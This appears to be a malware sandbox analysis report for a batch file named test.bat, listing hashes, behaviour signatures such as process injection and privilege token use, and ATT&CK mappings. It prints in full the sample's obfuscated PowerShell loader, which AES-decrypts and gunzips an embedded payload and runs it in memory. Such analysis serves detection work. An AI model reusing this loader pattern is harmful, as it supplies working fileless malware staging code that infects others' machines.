037565e9535d9521ad3ab3cfef0e6e91cad24b8e1cab83af7949dae67d95fb5c

Analysis

max time kernel
31s
max time network
34s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
01-02-2023 23:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.bat
Size

48KB
MD5

106c27af68b78b8670267a5eebfc8040
SHA1

a2bbfb23b51cb1f2bb213dfe410601bc7fa53875
SHA256

037565e9535d9521ad3ab3cfef0e6e91cad24b8e1cab83af7949dae67d95fb5c
SHA512

7de6b4f739f209c11cadee9360d5cb799b77bc5d4083b706a4d9bc21f501bb45e218715dbca6cd61811458b0efd190dba06dc04141650a48d91a305abf8e4600
SSDEEP

768:0oEB9ZEYgBM1D1gozT1RjnAKRc1pU9/gnEiCsfhh8pRA9buJsgsSxQ:jErqY7coz0JagnEtqh8pYbFgsSxQ

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

test.bat.exe

pid process

1784 test.bat.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

1432 cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

test.bat.exe

pid process

1784 test.bat.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

test.bat.exe

description pid process

Token: SeDebugPrivilege 1784 test.bat.exe

pid	process
1784	test.bat.exe

pid	process
1432	cmd.exe

pid	process
1784	test.bat.exe

description	pid	process
Token: SeDebugPrivilege	1784	test.bat.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 1432 wrote to memory of 1784	1432	cmd.exe	test.bat.exe
PID 1432 wrote to memory of 1784	1432	cmd.exe	test.bat.exe
PID 1432 wrote to memory of 1784	1432	cmd.exe	test.bat.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\test.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1432

C:\Users\Admin\AppData\Local\Temp\test.bat.exe
"test.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $IDBqQ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\test.bat').Split([Environment]::NewLine);foreach ($tScli in $IDBqQ) { if ($tScli.StartsWith(':: ')) { $NZVFu = $tScli.Substring(3); break; }; };$UPeLj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NZVFu);$OYivd = New-Object System.Security.Cryptography.AesManaged;$OYivd.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OYivd.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OYivd.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9jIvbQQrMXVTkWeSQpp2Gn0UtOPOB2NCbMxKhJ10/nw=');$OYivd.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('krrHd9BxMDg+kQ5ve/eVnA==');$mtmak = $OYivd.CreateDecryptor();$UPeLj = $mtmak.TransformFinalBlock($UPeLj, 0, $UPeLj.Length);$mtmak.Dispose();$OYivd.Dispose();$Tiyba = New-Object System.IO.MemoryStream(, $UPeLj);$sbkvz = New-Object System.IO.MemoryStream;$CwlxS = New-Object System.IO.Compression.GZipStream($Tiyba, [IO.Compression.CompressionMode]::Decompress);$CwlxS.CopyTo($sbkvz);$CwlxS.Dispose();$Tiyba.Dispose();$sbkvz.Dispose();$UPeLj = $sbkvz.ToArray();$nxXvq = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($UPeLj);$ZqEhy = $nxXvq.EntryPoint;$ZqEhy.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\test.bat.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
\Users\Admin\AppData\Local\Temp\test.bat.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/1784-55-0x0000000000000000-mapping.dmp

Download
memory/1784-57-0x000007FEFC311000-0x000007FEFC313000-memory.dmp

Filesize
8KB

Download
memory/1784-58-0x000007FEF3A50000-0x000007FEF4473000-memory.dmp

Filesize
10.1MB

Download
memory/1784-60-0x0000000002384000-0x0000000002387000-memory.dmp

Filesize
12KB

Download
memory/1784-59-0x000007FEF2EF0000-0x000007FEF3A4D000-memory.dmp

Filesize
11.4MB

Download
memory/1784-61-0x0000000002384000-0x0000000002387000-memory.dmp

Filesize
12KB

Download
memory/1784-62-0x000000000238B000-0x00000000023AA000-memory.dmp

Filesize
124KB

Download